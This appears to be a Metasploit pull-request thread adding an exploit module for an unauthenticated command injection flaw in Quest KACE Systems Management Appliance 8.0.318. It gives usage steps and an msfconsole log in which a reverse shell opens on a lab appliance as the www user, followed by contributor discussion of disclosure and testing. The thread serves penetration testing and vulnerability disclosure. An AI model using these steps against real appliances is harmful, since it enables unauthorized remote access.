Add Quest KACE Systems Management Command Injection

[bcoles]

Add Quest KACE Systems Management Command Injection exploit module.

     This module exploits a command injection vulnerability in Quest KACE
     Systems Management Appliance version 8.0.318 (and possibly prior).

     The `download_agent_installer.php` file allows unauthenticated users
     to execute arbitrary commands as the web server user `www`.

     A valid Organization ID is required. The default value is `1`.

     A valid Windows agent version number must also be provided. If file
     sharing is enabled, the agent versions are available within the
     `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
     Additionally, various agent versions are listed on the KACE website.

     This module has been tested successfully on Quest KACE Systems
     Management Appliance K1000 version 8.0 (Build 8.0.318).

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/unix/http/quest_kace_systems_management_rce
• set ORGANIZATION 1
• set AGENT_VERSION 8.0.152
• run
• Verify you get a shell

Scenarios

msf5 > use exploit/unix/http/quest_kace_systems_management_rce 
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.191.192
rhost => 172.16.191.192
msf5 exploit(unix/http/quest_kace_systems_management_rce) > check
[*] 172.16.191.192:80 The target appears to be vulnerable.
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1
ORGANIZATION => 1
set AGENT_VERSION 8.0.152
AGENT_VERSION => 8.0.152
msf5 exploit(unix/http/quest_kace_systems_management_rce) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Sending payload (505 bytes)
[+] Payload executed successfully
[!] Tried to delete /tmp/agentprov/1#;/, unknown result

492648046
kYWSsqpLmmERqEpLazwFOTzulPvsvShY
/kbox/kboxwww/common
EfiuBIzdwhsSLfEpgHrRjbgjszjCkfhf
ZGtYicImqwCnmUNGBZTpqDSPXojYXjkd
jCmxJgLnffuOAlsAFmWygrbOhCWPCNzD
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD k1000 11.0-RELEASE-p12 FreeBSD 11.0-RELEASE-p12 #0: Wed Aug  9 10:03:39 UTC 2017     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64
^C
Abort session 1? [y/N]  y

[*] 172.16.191.192 - Command shell session 1 closed.  Reason: User exit

[bcoles]

These issues were reported to the vendor about 4 months ago.

A hotfix for these issues was made public a little over two months ago and subsequently rolled into appliance updates.

Vulnerability details, including proof-of-concept, have been public for over 3 weeks.

The advisory does not make clear the simplicity with which these issues can be exploited. In particular, the unauthenticated remote command injection vulnerability is easily exploitable, as demonstrated by this module.

This exploit is not fully automated. Knowledge of a valid organization ID and agent version are required. The check method can be used to passively infer the security posture of the appliance by comparing the appliance version against a list of patched versions.

[wchen-r7]

Understood. Thank you.

So I downloaded k1000-ovf_80.zip this morning from the official website, looks like they posted it on Dec 15 2017. Do we have to worry about auto-update when we spin up this appliance? Thanks.

[wvu]

@wchen-r7: You could set networking to host-only unless the update is mandatory.

[wchen-r7]

Gotcha. Thanks!

[bcoles]

I had no issues with auto-updates. I also didn't test the hotfix.

[space-r7]

Release Notes

Add an exploit module that exploits a command injection vulnerability in Quest KACE Systems Management Appliance version 8.0.318.

[wvu]

@space-r7: If you did any repro, please post logs and/or notes here. Thanks!